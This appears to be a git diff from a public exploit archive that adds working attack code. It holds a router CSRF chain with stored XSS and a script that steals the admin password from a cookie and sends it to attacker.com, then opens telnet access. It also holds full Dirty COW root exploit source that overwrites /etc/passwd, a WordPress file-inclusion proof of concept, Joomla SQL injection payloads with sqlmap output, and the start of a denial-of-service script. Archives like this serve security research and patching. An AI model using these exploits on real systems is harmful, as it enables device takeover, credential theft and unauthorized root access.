+<input type="hidden" name='UMSStatus' value='Enabled'>
+
+
+</form>
+
+<script>document.x.submit();</script>
+
+
+9) UNBLOCK DEVICE
+
+http://10.0.0.1/actionHandler/ajax_managed_devices.php?del=2
+
+
+10) ADD BLOCKED DEVICE (COMES WITH BONUS STORED XSS ;)
+
+<form name="x" action="http://10.0.0.1/actionHandler/ajax_managed_devices.php" method="post">
+
+<input type="hidden" name='add' value='true'>
+<input type="hidden" name='type' value='Block'>
+<input type="hidden" name='name' value='<img src=x onerror=alert(0)>'>
+<input type="hidden" name='mac' value='xx:xx:xx:xx:xx:x2'>
+<input type="hidden" name='block' value='true'>
+
+
+</form>
+
+<script>document.x.submit();</script>
+
+
+11) ENABLE/DISABLE MANAGED DEVICES
+
+<form name="x" action="http://10.0.0.1/actionHandler/ajax_managed_devices.php" method="post">
+
+<input type="hidden" name='set' value='true'>
+<input type="hidden" name='UMDStatus' value='Enabled'>
+
+
+
+</form>
+
+<script>document.x.submit();</script>
+
+
+12) ADD PORT FORWARDING SERVICE (COMES WITH BONUS STORED XSS ;)
+
+<form name="x" action="http://10.0.0.1/actionHandler/ajax_port_forwarding.php" method="post">
+
+<input type="hidden" name='add' value='true'>
+<input type="hidden" name='name' value='<img src=x onerror=alert(1)>'>
+<input type="hidden" name='protocol' value='TCP/UDP'>
+<input type="hidden" name='ip' value='10.0.0.82'>
+<input type="hidden" name='ipv6addr' value='x'>
+<input type="hidden" name='startport' value='123'>
+<input type="hidden" name='endport' value='123'>
+
+</form>
+
+<script>document.x.submit();</script>
+
+
+13) DELETE A PORT FORWARDING SERVICE
+
+http://10.0.0.1/actionHandler/ajax_port_forwarding.php?del=5
+
+
+14) EDIT EXISTING PORT FORWARDING SERVICES
+
+<form name="x" action="http://10.0.0.1/actionHandler/ajax_port_forwarding.php" method="post">
+
+<input type="hidden" name='edit' value='true'>
+<input type="hidden" name='name' value=‘huhuhuh???New Name then …’>
+<input type="hidden" name='protocol' value='TCP/UDP'>
+<input type="hidden" name='ip' value='10.0.0.82'>
+<input type="hidden" name='ipv6addr' value='x'>
+<input type="hidden" name='startport' value='123'>
+<input type="hidden" name='endport' value='123'>
+<input type="hidden" name='ID' value='4'>
+
+
+</form>
+
+<script>document.x.submit();</script>
+
+
+15) ENABLE/DISABLE PORT FORWARDING
+
+<form name="x" action="http://10.0.0.1/actionHandler/ajax_port_forwarding.php" method="post">
+
+<input type="hidden" name='set' value='true'>
+<input type="hidden" name='UFWDStatus' value='Enabled'>
+
+
+
+</form>
+
+<script>document.x.submit();</script>
+
+
+I’ll ignore port triggering cuz idc about port triggering . . .
+
+16) CHANGE REMOTE MANAGEMENT SERVICE
+
+<form name="x" action="http://10.0.0.1/actionHandler/ajax_remote_management.php" method="post">
+
+<input type="hidden" name='http' value='true'>
+<input type="hidden" name='httport' value='notset'>
+<input type="hidden" name='https' value='true'>
+<input type="hidden" name='httpsport' value='notset'>
+<input type="hidden" name='allowtype' value='notset'>
+<input type="hidden" name='startIP' value='notset'>
+<input type="hidden" name='endIP' value='notset'>
+<input type="hidden" name='telnet' value='notset'>
+<input type="hidden" name='ssh' value='notset'>
+<input type="hidden" name='startIPv6' value='notset'>
+<input type="hidden" name='endIPv6' value='notset'>
+
+
+</form>
+
+<script>document.x.submit();</script>
+
+
+17) CHANGE FIREWALL SETTINGS
+
+<form name="x" action="http://10.0.0.1/actionHandler/ajaxSet_firewall_config.php" method="post">
+
+<input type="hidden" name='configInfo' value='{"firewallLevel": "Low", "block_http": "Disabled", "block_icmp": "Disabled", "block_multicast": "Disabled", "block_peer": "Disabled", "block_ident": "Disabled", "disableFwForTrueStaticIP": "undefined"} '>
+
+
+
+</form>
+
+<script>document.x.submit();</script>
+
+
+18) CHANGE PASSWORD PoC
+
+UPLOAD test1.js TO yourjavascript.com (OR USE THE ONE I ALREADY UPLOADED : http://yourjavascript.com/1663477161/test1.js )
+CONTENTS ARE:
+document.cookie="PHPSESSID=1";k=document.cookie;f=k.replace("PHPSESSID=1","");d=f.replace("auth=","");s=d.replace(";","");g=s.replace("%3D","");t=atob(g);console.log(t);l=t.replace("admin:","");console.log(l);var xhttp=new XMLHttpRequest();xhttp.open("POST","/actionHandler/ajaxSet_password_config.php",true);xhttp.send('configInfo={"newPassword": “testpassword123”, "oldPassword”: “’+ l+’”}’);
+
+SHORTEN URL ON GOOGLE (OR USE THE ONE I ALREADY SHORTENED : http://goo.gl/FQHkQj)
+
+CREATE HTML FILE : 
+
+<form name="x" action="http://10.0.0.1/actionHandler/ajax_managed_devices.php" method="post">
+
+<input type="hidden" name='add' value='true'>
+<input type="hidden" name='type' value='Block'>
+<input type="hidden" name='name' value='<script src="http://goo.gl/FQHkQj">'>
+<input type="hidden" name='mac' value='xx:xx:xx:xx:xx:x8'>
+<input type="hidden" name='block' value='true'>
+
+
+</form>
+
+<script>document.x.submit();</script>
+
+I PUT ON SRC IN THE SCRIPT TAG MY SHORTENED URL
+
+
+19) GET PASSWORD PoC
+
+UPLOAD test1.js TO yourjavascript.com
+CONTENTS ARE:
+document.cookie="PHPSESSID=1";k=document.cookie;f=k.replace("PHPSESSID=1","");d=f.replace("auth=","");s=d.replace(";","");g=s.replace("%3D","");t=atob(g);console.log(t);l=t.replace("admin:","");console.log(l);var xhttp=new XMLHttpRequest();xhttp.open("POST","http://attacker.com/get_password.php",true);xhttp.send('configInfo={"newPassword": “testpassword123”, "oldPassword”: “’+ l+’”}’);
+
+SHORTEN URL ON GOOGLE 
+
+CREATE HTML FILE : 
+
+<form name="x" action="http://10.0.0.1/actionHandler/ajax_managed_devices.php" method="post">
+
+<input type="hidden" name='add' value='true'>
+<input type="hidden" name='type' value='Block'>
+<input type="hidden" name='name' value='<script src="shortened url">'>
+<input type="hidden" name='mac' value='xx:xx:xx:xx:xx:x8'>
+<input type="hidden" name='block' value='true'>
+
+
+</form>
+
+<script>document.x.submit();</script>
+
+I PUT ON SRC IN THE SCRIPT TAG MY SHORTENED URL
+20) ACCESS DEVICES IN THE NETWORK
+<form name="x" action="http://10.0.0.1/actionHandler/ajax_port_forwarding.php" method="post">
+
+<input type="hidden" name='add' value='true'>
+<input type="hidden" name='name' value='something'>
+<input type="hidden" name='protocol' value='TCP/UDP'>
+<input type="hidden" name='ip' value='Target Internal IP'>
+<input type="hidden" name='ipv6addr' value='x'>
+<input type="hidden" name='startport' value='Target Port'>
+<input type="hidden" name='endport' value='Target Port'>
+
+</form>
+
+<script>document.x.submit();</script>
+
+21) CREATE A NEW PRIVATE WI-FI NETWORK WITH THE PASSWORD OF YOUR CHOICE:
+
+<form name="x" action="http://10.0.0.1/actionHandler/ajaxSet_wireless_network_configuration_edit.php" method="post">
+
+<input type="hidden" name='configInfo' value='{"radio_enable":"true", "network_name":"MY-OWN-PRIVATE-PERSONAL-NETWORK", "wireless_mode":"g,n", "security":"WPAWPA2_PSK_TKIPAES", "channel_automatic":"true", "channel_number":"5", "network_password”:”password”, "broadcastSSID":"true", "enableWMM":"true", "ssid_number”:”3”}’>
+
+</form>
+
+<script>document.x.submit();</script>
+
+22) RCE
+HTML FILE:
+<form name="x" action="http://10.0.0.1/actionHandler/ajax_remote_management.php" method="post">
+
+<input type="hidden" name='http' value='true'>
+<input type="hidden" name='httport' value='notset'>
+<input type="hidden" name='https' value='true'>
+<input type="hidden" name='httpsport' value='notset'>
+<input type="hidden" name='allowtype' value='notset'>
+<input type="hidden" name='startIP' value='notset'>
+<input type="hidden" name='endIP' value='notset'>
+<input type="hidden" name='telnet' value='true'>
+<input type="hidden" name='ssh' value='true'>
+<input type="hidden" name='startIPv6' value='notset'>
+<input type="hidden" name='endIPv6' value='notset'>
+
+
+</form>
+<!--Do part 19)-->
+
+<form name="h" action="http://10.0.0.1/actionHandler/ajax_managed_devices.php" method="post">
+
+<input type="hidden" name='add' value='true'>
+<input type="hidden" name='type' value='Block'>
+<input type="hidden" name='name' value='<script src="shortened url">'>
+<input type="hidden" name='mac' value='xx:xx:xx:xx:xx:x8'>
+<input type="hidden" name='block' value='true'>
+
+
+</form>
+
+
+<form name="f" action="http://10.0.0.1/actionHandler/ajaxSet_firewall_config.php" method="post">
+
+<input type="hidden" name='configInfo' value='{"firewallLevel": "Low", "block_http": "Disabled", "block_icmp": "Disabled", "block_multicast": "Disabled", "block_peer": "Disabled", "block_ident": "Disabled", "disableFwForTrueStaticIP": "undefined"} '>
+
+
+
+</form>
+<script>document.x.submit();document.h.submit();document.f.submit();</script>
+
+THEN TELNET TO THE IP ADDRESS THAT SENT THE REQUEST TO ATTACKER.COM/GET_PASSWORD.PHP AND USE THE USERNAME 'admin' AND THE PASSWORD YOU GOT IN ATTACKER.COM/GET_PASSWORD.PHP
+
+THE AUTHOR TAKES NO RESPONSIBILITY FOR DAMAGE DONE WITH THIS EXPLOIT.
+FOR PUBLISHING OR SENDING OR COPYING THIS EXPLOIT THE AUTHOR MUST BE GIVEN FULL CREDIT FOR THE EXPLOIT.
+IF THE VULNERABILITY IS REPORTED TO VENDOR AND VENDOR RESPONDS AND FIXES IT THEN FULL CREDIT MUST BE GIVEN TO THE AUTHOR.

platforms/linux/local/40616.c

@@ -1,4 +1,7 @@
 /*
+*
+* EDB-Note: After getting a shell, doing "echo 0 > /proc/sys/vm/dirty_writeback_centisecs" may make the system more stable.
+*
 * (un)comment correct payload first (x86 or x64)!
 * 
 * $ gcc cowroot.c -o cowroot -pthread

platforms/linux/local/40839.c

@@ -1,29 +1,34 @@
+// EDB-Note: After getting a shell, doing "echo 0 > /proc/sys/vm/dirty_writeback_centisecs" may make the system more stable.
 //
-// This exploit uses the pokemon exploit as a base and automatically
+// This exploit uses the pokemon exploit of the dirtycow vulnerability
-// generates a new passwd line. The original /etc/passwd is then
+// as a base and automatically generates a new passwd line.
-// backed up to /tmp/passwd.bak and overwritten with the new line.
 // The user will be prompted for the new password when the binary is run.
+// The original /etc/passwd file is then backed up to /tmp/passwd.bak
+// and overwrites the root account with the generated line.
 // After running the exploit you should be able to login with the newly
 // created user.
 //
-// Original exploit:
+// To use this exploit modify the user values according to your needs.
+//   The default is "firefart".
+//
+// Original exploit (dirtycow's ptrace_pokedata "pokemon" method):
 //   https://github.com/dirtycow/dirtycow.github.io/blob/master/pokemon.c
 //
-// To use this exploit modify the user values according to your needs
+// Compile with:
-//
-// Compile with
-//
 //   gcc -pthread dirty.c -o dirty -lcrypt
 //
-// and just run the newly create binary with ./dirty
+// Then run the newly create binary by either doing:
+//   "./dirty" or "./dirty my-new-password"
+//
+// Afterwards, you can either "su firefart" or "ssh firefart@..."
 //
 // DON'T FORGET TO RESTORE YOUR /etc/passwd AFTER RUNNING THE EXPLOIT!
+//   mv /tmp/passwd.bak /etc/passwd
 //
 // Exploit adopted by Christian "FireFart" Mehlmauer
 // https://firefart.at
 //
 
-
 #include <fcntl.h>
 #include <pthread.h>
 #include <string.h>
@@ -131,7 +136,15 @@ int main(int argc, char *argv[])
   user.home_dir = "/root";
   user.shell = "/bin/bash";
 
-  char *plaintext_pw = getpass("Please enter new password: ");
+  char *plaintext_pw;
+
+  if (argc >= 2) {
+    plaintext_pw = argv[1];
+    printf("Please enter the new password: %s\n", plaintext_pw);
+  } else {
+    plaintext_pw = getpass("Please enter the new password: ");
+  }
+
   user.hash = generate_password_hash(plaintext_pw);
   char *complete_passwd_line = generate_passwd_line(user);
   printf("Complete line:\n%s\n", complete_passwd_line);

platforms/linux/local/40847.cpp

@@ -0,0 +1,261 @@
+// EDB-Note: Compile:   g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
+// EDB-Note: Recommended way to run:   ./dcow -s    (Will automatically do "echo 0 > /proc/sys/vm/dirty_writeback_centisecs")
+//
+// -----------------------------------------------------------------
+// Copyright (C) 2016  Gabriele Bonacini
+//
+// This program is free software; you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation; either version 3 of the License, or
+// (at your option) any later version.
+// This program is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+// GNU General Public License for more details.
+// You should have received a copy of the GNU General Public License
+// along with this program; if not, write to the Free Software Foundation,
+// Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301  USA
+// -----------------------------------------------------------------
+
+#include <iostream>
+#include <fstream>
+#include <string>
+#include <thread>
+#include <sys/mman.h>
+#include <fcntl.h>
+#include <unistd.h>
+#include <sys/types.h>
+#include <pwd.h>
+#include <pty.h>
+#include <string.h>
+#include <termios.h>
+#include <sys/wait.h>
+#include <signal.h>
+
+#define  BUFFSIZE    1024
+#define  PWDFILE     "/etc/passwd"
+#define  BAKFILE     "./.ssh_bak"
+#define  TMPBAKFILE  "/tmp/.ssh_bak"
+#define  PSM         "/proc/self/mem"
+#define  ROOTID      "root:"
+#define  SSHDID      "sshd:"
+#define  MAXITER     300
+#define  DEFPWD      "$6$P7xBAooQEZX/ham$9L7U0KJoihNgQakyfOQokDgQWLSTFZGB9LUU7T0W2kH1rtJXTzt9mG4qOoz9Njt.tIklLtLosiaeCBsZm8hND/"
+#define  TXTPWD      "dirtyCowFun\n"
+#define  DISABLEWB   "echo 0 > /proc/sys/vm/dirty_writeback_centisecs\n"
+#define  EXITCMD     "exit\n"
+#define  CPCMD       "cp "
+#define  RMCMD       "rm "
+
+using namespace std;
+
+class Dcow{
+    private:
+       bool              run,        rawMode,     opShell,   restPwd;
+       void              *map;
+       int               fd,         iter,        master,    wstat;
+       string            buffer,     etcPwd,      etcPwdBak,
+                         root,       user,        pwd,       sshd;
+       thread            *writerThr, *madviseThr, *checkerThr;
+       ifstream          *extPwd;
+       ofstream          *extPwdBak;
+       struct passwd     *userId;
+       pid_t             child;  
+       char              buffv[BUFFSIZE];
+       fd_set            rfds;
+       struct termios    termOld,    termNew;
+       ssize_t           ign;
+
+       void exitOnError(string msg);
+    public:
+       Dcow(bool opSh, bool rstPwd);
+       ~Dcow(void);
+       int  expl(void);         
+};
+
+Dcow::Dcow(bool opSh, bool rstPwd) : run(true), rawMode(false), opShell(opSh), restPwd(rstPwd),
+                   iter(0), wstat(0), root(ROOTID), pwd(DEFPWD), sshd(SSHDID), writerThr(nullptr),
+                   madviseThr(nullptr), checkerThr(nullptr), extPwd(nullptr), extPwdBak(nullptr), 
+                   child(0){ 
+   userId = getpwuid(getuid());
+   user.append(userId->pw_name).append(":");
+   extPwd = new ifstream(PWDFILE);   
+   while (getline(*extPwd, buffer)){
+       buffer.append("\n");
+       etcPwdBak.append(buffer);
+       if(buffer.find(root) == 0){
+          etcPwd.insert(0, root).insert(root.size(), pwd);
+          etcPwd.insert(etcPwd.begin() + root.size() + pwd.size(), 
+                        buffer.begin() + buffer.find(":", root.size()), buffer.end());
+       }else if(buffer.find(user) == 0 ||  buffer.find(sshd) == 0 ){
+          etcPwd.insert(0, buffer);
+       }else{
+          etcPwd.append(buffer);
+       }
+   }
+   extPwdBak = new ofstream(restPwd ? TMPBAKFILE : BAKFILE);
+   extPwdBak->write(etcPwdBak.c_str(), etcPwdBak.size());
+   extPwdBak->close();
+   fd = open(PWDFILE,O_RDONLY);
+   map = mmap(nullptr, etcPwdBak.size(), PROT_READ,MAP_PRIVATE, fd, 0);
+}
+
+Dcow::~Dcow(void){
+   extPwd->close();
+   close(fd);
+   delete extPwd; delete extPwdBak; delete madviseThr; delete writerThr; delete checkerThr;
+   if(rawMode)    tcsetattr(STDIN_FILENO, TCSANOW, &termOld);
+   if(child != 0) wait(&wstat); 
+}
+
+void Dcow::exitOnError(string msg){
+      cerr << msg << endl;
+      // if(child != 0) kill(child, SIGKILL);
+      throw new exception();
+}
+
+int  Dcow::expl(void){
+   madviseThr = new thread([&](){ while(run){ madvise(map, etcPwdBak.size(), MADV_DONTNEED);} });
+   writerThr  = new thread([&](){ int fpsm = open(PSM,O_RDWR);  
+                                  while(run){ lseek(fpsm, reinterpret_cast<off_t>(map), SEEK_SET); 
+                                              ign = write(fpsm, etcPwd.c_str(), etcPwdBak.size()); }
+                                });
+   checkerThr = new thread([&](){ while(iter <= MAXITER){ 
+                                         extPwd->clear(); extPwd->seekg(0, ios::beg); 
+                                         buffer.assign(istreambuf_iterator<char>(*extPwd),
+                                                       istreambuf_iterator<char>());
+                                         if(buffer.find(pwd) != string::npos && 
+                                            buffer.size() >= etcPwdBak.size()){
+                                                run = false; break;
+                                         }
+                                         iter ++; usleep(300000);
+                                   }
+                                   run = false;
+                                 });
+
+  cerr << "Running ..." << endl;
+  madviseThr->join();
+  writerThr->join();
+  checkerThr->join();
+
+  if(iter <= MAXITER){ 
+       child = forkpty(&master, nullptr, nullptr, nullptr);
+
+       if(child == -1) exitOnError("Error forking pty.");
+
+       if(child == 0){ 
+          execlp("su", "su", "-", nullptr);
+          exitOnError("Error on exec.");
+       }
+
+       if(opShell) cerr << "Password overridden to: " <<  TXTPWD << endl;
+       memset(buffv, 0, BUFFSIZE);
+       ssize_t bytes_read = read(master, buffv, BUFFSIZE - 1);
+       if(bytes_read <= 0) exitOnError("Error reading  su prompt.");
+       cerr << "Received su prompt (" << buffv << ")" << endl; 
+
+       if(write(master, TXTPWD, strlen(TXTPWD)) <= 0) 
+            exitOnError("Error writing pwd on tty.");
+
+       if(write(master, DISABLEWB, strlen(DISABLEWB)) <= 0) 
+            exitOnError("Error writing cmd on tty.");
+
+       if(!opShell){
+            if(write(master, EXITCMD, strlen(EXITCMD)) <= 0) 
+                 exitOnError("Error writing exit cmd on tty.");
+       }else{
+           if(restPwd){
+               string restoreCmd = string(CPCMD).append(TMPBAKFILE).append(" ").append(PWDFILE).append("\n");
+               if(write(master, restoreCmd.c_str(), restoreCmd.size()) <= 0) 
+                    exitOnError("Error writing restore cmd on tty.");
+               restoreCmd        = string(RMCMD).append(TMPBAKFILE).append("\n");
+               if(write(master, restoreCmd.c_str(), restoreCmd.size()) <= 0) 
+                    exitOnError("Error writing restore cmd (rm) on tty.");
+           }
+
+           if(tcgetattr(STDIN_FILENO, &termOld) == -1 )
+                exitOnError("Error getting terminal attributes.");
+    
+           termNew               = termOld;
+           termNew.c_lflag       &= static_cast<unsigned long>(~(ICANON | ECHO));
+    
+           if(tcsetattr(STDIN_FILENO, TCSANOW, &termNew) == -1)
+                exitOnError("Error setting terminal in non-canonical mode.");
+           rawMode = true;
+    
+           while(true){
+                FD_ZERO(&rfds);
+                FD_SET(master, &rfds);
+                FD_SET(STDIN_FILENO, &rfds);
+    
+                if(select(master + 1, &rfds, nullptr, nullptr, nullptr) < 0 )
+                    exitOnError("Error on select tty.");
+    
+                if(FD_ISSET(master, &rfds)) {
+                    memset(buffv, 0, BUFFSIZE);
+                    bytes_read = read(master, buffv, BUFFSIZE - 1);
+                    if(bytes_read <= 0) break;
+                    if(write(STDOUT_FILENO, buffv, bytes_read) != bytes_read)
+                          exitOnError("Error writing on stdout.");
+                }
+    
+                if(FD_ISSET(STDIN_FILENO, &rfds)) {
+                    memset(buffv, 0, BUFFSIZE);
+                    bytes_read = read(STDIN_FILENO, buffv, BUFFSIZE - 1);
+                    if(bytes_read <= 0) exitOnError("Error reading from stdin.");
+                    if(write(master, buffv, bytes_read) != bytes_read) break;
+                }
+            }
+      }
+  }
+ 
+  return [](int ret, bool shell){ 
+       string msg = shell ? "Exit.\n" : string("Root password is:   ") + TXTPWD + "Enjoy! :-)\n";
+       if(ret <= MAXITER){cerr << msg; return 0;}
+       else{cerr << "Exploit failed.\n"; return 1;} 
+  }(iter, opShell);
+}
+
+void printInfo(char* cmd){
+      cerr << cmd << " [-s] [-n] | [-h]\n" << endl;
+      cerr << " -s  open directly a shell, if the exploit is successful;" << endl;
+      cerr << " -n  combined with -s, doesn't restore the passwd file." << endl;
+      cerr << " -h  print this synopsis;" << endl;
+      cerr << "\n If no param is specified, the program modifies the passwd file and exits." << endl;
+      cerr << " A copy of the passwd file will be create in the current directory as .ssh_bak" << endl;
+      cerr << " (unprivileged user), if no parameter or -n is specified.\n" << endl;
+      exit(1);
+}
+
+int main(int argc, char** argv){
+   const char  flags[]   = "shn";
+   int         c;
+   bool        opShell   = false,
+               restPwd   = true;
+
+   opterr = 0;
+   while ((c = getopt(argc, argv, flags)) != -1){
+      switch (c){
+         case 's':
+            opShell = true;
+         break;
+         case 'n':
+            restPwd = false;
+         break;
+         case 'h':
+            printInfo(argv[0]);
+         break;
+         default:
+            cerr << "Invalid parameter." << endl << endl;
+            printInfo(argv[0]);
+      }
+   }
+
+   if(!restPwd && !opShell){
+            cerr << "Invalid parameter: -n requires -s" << endl << endl;
+            printInfo(argv[0]);
+   }
+
+   Dcow dcow(opShell, restPwd);
+   return dcow.expl();
+}

platforms/php/webapps/31796.txt

@@ -1,12 +0,0 @@
-source: http://www.securityfocus.com/bid/29227/info
-
-Internet Photoshow is prone to a vulnerability that can result in unauthorized database access.
-
-Attackers can exploit this issue to gain administrative access to the application.
-
-Internet Photoshow Special Edition is vulnerable; other editions may also be affected.
-
-The following example code is available:
-
-javascript:document.cookie = "login_admin=true; path=/";
-

platforms/php/webapps/40850.txt

@@ -0,0 +1,30 @@
+# Exploit Title:  WP Vault 0.8.6.6 – Plugin WordPress – Local File Inclusion
+# Date: 28/11/2016
+# Exploit Author: Lenon Leite
+# Vendor Homepage: https://wordpress.org/plugins/wp-vault/
+# Software Link: https://wordpress.org/plugins/wp-vault/
+# Contact: http://twitter.com/lenonleite
+# Website: http://lenonleite.com.br/
+# Category: webapps
+# Version: 0.8.6.6
+# Tested on: Ubuntu 14.04
+
+1 - Description:
+
+$_GET[“wpv-image”] is not escaped in include file.
+
+http://lenonleite.com.br/en/blog/2016/11/30/wp-vault-0-8-6-6-local-file-inclusion/
+
+
+2 - Proof of Concept:
+
+http://Target/?wpv-image=[LFI]
+
+http://Target/?wpv-image=../../../../../../../../../../etc/passwd
+
+3 - Timeline:
+
+12/11/2016 - Discovered
+12/11/2016 - vendor not found
+
+

platforms/php/webapps/40851.txt

@@ -0,0 +1,70 @@
+Title: Unauthenticated SQL Injection in Huge-IT Catalog v1.0.7 for Joomla
+Author: Larry W. Cashdollar, @_larry0
+Date: 2016-09-16
+Download Site: http://huge-it.com/joomla-catalog/
+Vendor: huge-it.com
+Vendor Notified: 2016-09-17
+Vendor Contact: info@huge-it.com
+Description: 
+Huge-IT Product Catalog is made for demonstration, sale, advertisements for your products. Imagine a stand with a 
+variety of catalogs with a specific product category. To imagine is not difficult, to use is even easier.
+
+Vulnerability:
+The following code does not prevent an unauthenticated user from injecting SQL into functions via 'load_more_elements_into_catalog' located in ajax_url.php. 
+
+Vulnerable Code in : ajax_url.php
+
+ 11 define('_JEXEC', 1);
+ 12 defined('_JEXEC') or die('Restircted access');
+.
+.
+.
+308         } elseif ($_POST["post"] == "load_more_elements_into_catalog") {
+309             $catalog_id = $_POST["catalog_id"];
+310             $old_count = $_POST["old_count"];
+311             $count_into_page = $_POST["count_into_page"];
+312             $show_thumbs = $_POST["show_thumbs"];
+313             $show_description = $_POST["show_description"];
+314             $show_linkbutton = $_POST["show_linkbutton"];
+315             $parmalink = $_POST["parmalink"];
+316             $level = $_POST['level'];
+.
+.
+.
+359             $query->select('*');
+360             $query->from('#__huge_it_catalog_products');
+361             $query->where('catalog_id =' . $catalog_id);
+362             $query->order('ordering asc');
+363             $db->setQuery($query, $from, $count_into_page);
+
+CVE-ID: CVE-2016-1000125
+Export: JSON TEXT XML
+Exploit Code:
+	• $ sqlmap -u 'http://example.com/components/com_catalog/ajax_url.php' --data="prod_page=1&post=load_more_elements_into_catalog&catalog_id=*&old_count=*&count_into_page=*&show_thumbs=*&show_description=*&parmalink=*"  --level=5 --risk=3
+	•  
+	• Parameter: #1* ((custom) POST)
+	•     Type: error-based
+	•     Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
+	•     Payload: prod_page=1&post=load_more_elements_into_catalog&catalog_id=-2369 OR 1 GROUP BY CONCAT(0x717a627871,(SELECT (CASE WHEN (1973=1973) THEN 1 ELSE 0 END)),0x716b787671,FLOOR(RAND(0)*2)) HAVING MIN(0)#&old_count=&count_into_page=&show_thumbs=&show_description=&parmalink=
+	•  
+	•     Type: AND/OR time-based blind
+	•     Title: MySQL >= 5.0.12 time-based blind - Parameter replace
+	•     Payload: prod_page=1&post=load_more_elements_into_catalog&catalog_id=(CASE WHEN (7371=7371) THEN SLEEP(5) ELSE 7371 END)&old_count=&count_into_page=&show_thumbs=&show_description=&parmalink=
+	•  
+	•     Type: UNION query
+	•     Title: Generic UNION query (random number) - 15 columns
+	•     Payload: prod_page=1&post=load_more_elements_into_catalog&catalog_id=-5943 UNION ALL SELECT 2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,CONCAT(0x717a627871,0x494a475477424c724f6f7853556d61597544576f4b614d6e41596771595253476c4251797a685974,0x716b787671)-- FvOy&old_count=&count_into_page=&show_thumbs=&show_description=&parmalink=
+	• ---
+	• [16:48:10] [INFO] the back-end DBMS is MySQL
+	• web server operating system: Linux Debian 8.0 (jessie)
+	• web application technology: Apache 2.4.10
+	• back-end DBMS: MySQL >= 5.0.12
+	• [16:48:10] [WARNING] HTTP error codes detected during run:
+	• 500 (Internal Server Error) - 6637 times
+	• [16:48:10] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/example.com'
+	•  
+	• [*] shutting down at 16:48:10
+	•  
+
+Advisory: http://www.vapidlabs.com/advisory.php?v=171
+

platforms/php/webapps/40852.txt

@@ -0,0 +1,59 @@
+Title: Unauthenticated SQL Injection in Huge-IT Portfolio Gallery Joomla extension v1.0.6
+Author: Larry W. Cashdollar, @_larry0
+Date: 2016-09-16
+Download Site: http://huge-it.com/joomla-portfolio-gallery/
+Vendor: huge-it.com
+Vendor Notified: 2016-09-17
+Vendor Contact: info@huge-it.com
+Description: Huge-IT Portfolio Gallery extension can do wonders with your website. If you wish to show your photos, videos, enclosing the additional images and videos, then this Portfolio Gallery extension is what you need.
+Vulnerability:
+The following lines allow unauthenticated users to perform SQL injection against the functions in ajax_url.php:
+
+In file ajax_url.php:
+
+  11 define('_JEXEC',1);
+  12 defined('_JEXEC') or die('Restircted access');
+.
+.
+.
+  49             $page = $_POST["page"];
+  50             $num=$_POST['perpage'];
+  51             $start = $page * $num - $num;
+  52             $idofgallery=$_POST['galleryid'];
+  53             $level = $_POST['level'];
+  54             $query = $db->getQuery(true);
+  55             $query->select('*');
+  56             $query->from('#__huge_itportfolio_images');
+  57             $query->where('portfolio_id ='.$idofgallery);
+  58             $query ->order('#__huge_itportfolio_images.ordering asc');
+  59             $db->setQuery($query,$start,$num);
+
+CVE-ID: CVE-2016-1000124
+Export: JSON TEXT XML
+Exploit Code:
+	• $ sqlmap -u 'http://example.com/components/com_portfoliogallery/ajax_url.php' --data="page=1&galleryid=*&post=huge_it_portfolio_gallery_ajax&perpage=20&linkbutton=2"  --level=5 --risk=3
+	•  
+	•  
+	• (custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
+	• sqlmap identified the following injection point(s) with a total of 2870 HTTP(s) requests:
+	• ---
+	• Parameter: #1* ((custom) POST)
+	•     Type: error-based
+	•     Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
+	•     Payload: page=1&galleryid=-2264 OR 1 GROUP BY CONCAT(0x71716a7a71,(SELECT (CASE WHEN (3883=3883) THEN 1 ELSE 0 END)),0x7178627071,FLOOR(RAND(0)*2)) HAVING MIN(0)#&post=huge_it_portfolio_gallery_ajax&perpage=20&linkbutton=2
+	•  
+	•     Type: AND/OR time-based blind
+	•     Title: MySQL >= 5.0.12 time-based blind - Parameter replace
+	•     Payload: page=1&galleryid=(CASE WHEN (9445=9445) THEN SLEEP(5) ELSE 9445 END)&post=huge_it_portfolio_gallery_ajax&perpage=20&linkbutton=2
+	• ---
+	• [13:30:39] [INFO] the back-end DBMS is MySQL
+	• web server operating system: Linux Debian 8.0 (jessie)
+	• web application technology: Apache 2.4.10
+	• back-end DBMS: MySQL >= 5.0.12
+	• [13:30:39] [WARNING] HTTP error codes detected during run:
+	• 500 (Internal Server Error) - 2715 times
+	• [13:30:39] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/192.168.0.4'
+	•  
+	• [*] shutting down at 13:30:39
+Screen Shots:
+Advisory: http://www.vapidlabs.com/advisory.php?v=170

platforms/windows/dos/40849.py

@@ -0,0 +1,101 @@
+#!/usr/bin/env python
+#
+#
+# X5 Webserver 5.0 Remote Denial Of Service Exploit
+#
+#
+# Vendor: iMatrix
+# Product web page: http://www.xitami.com
+# Affected version: 5.0a0
+#
+# Summary: X5 is the latest generation web server from iMatix Corporation.
+# The Xitami product line stretches back to 1996. X5 is built using iMatix's
+# current Base2 technology for multithreading applications. On multicore machines,
+# it is much more scalable than Xitami/2.
+#
+# Desc: The vulnerability is caused due to a NULL pointer dereference when processing
+# malicious HEAD and GET requests. This can be exploited to cause denial of service
+# scenario.
+#
+# ----------------------------------------------------------------------------
+#
+# (12c0.164c): Access violation - code c0000005 (first chance)
+# First chance exceptions are reported before any exception handling.
+# This exception may be expected and handled.
+# *** WARNING: Unable to verify checksum for C:\zslab\ws\64327\xitami-5.0a0-windows\xitami.exe
+# *** ERROR: Module load completed but symbols could not be loaded for C:\zslab\ws\64327\xitami-5.0a0-windows\xitami.exe
+# eax=0070904d ebx=03a91808 ecx=0070904d edx=00000000 esi=0478fef4 edi=0478fe8c
+# eip=00503ae0 esp=0478fb28 ebp=0478fb48 iopl=0         nv up ei pl zr na pe nc
+# cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
+# xitami+0x103ae0:
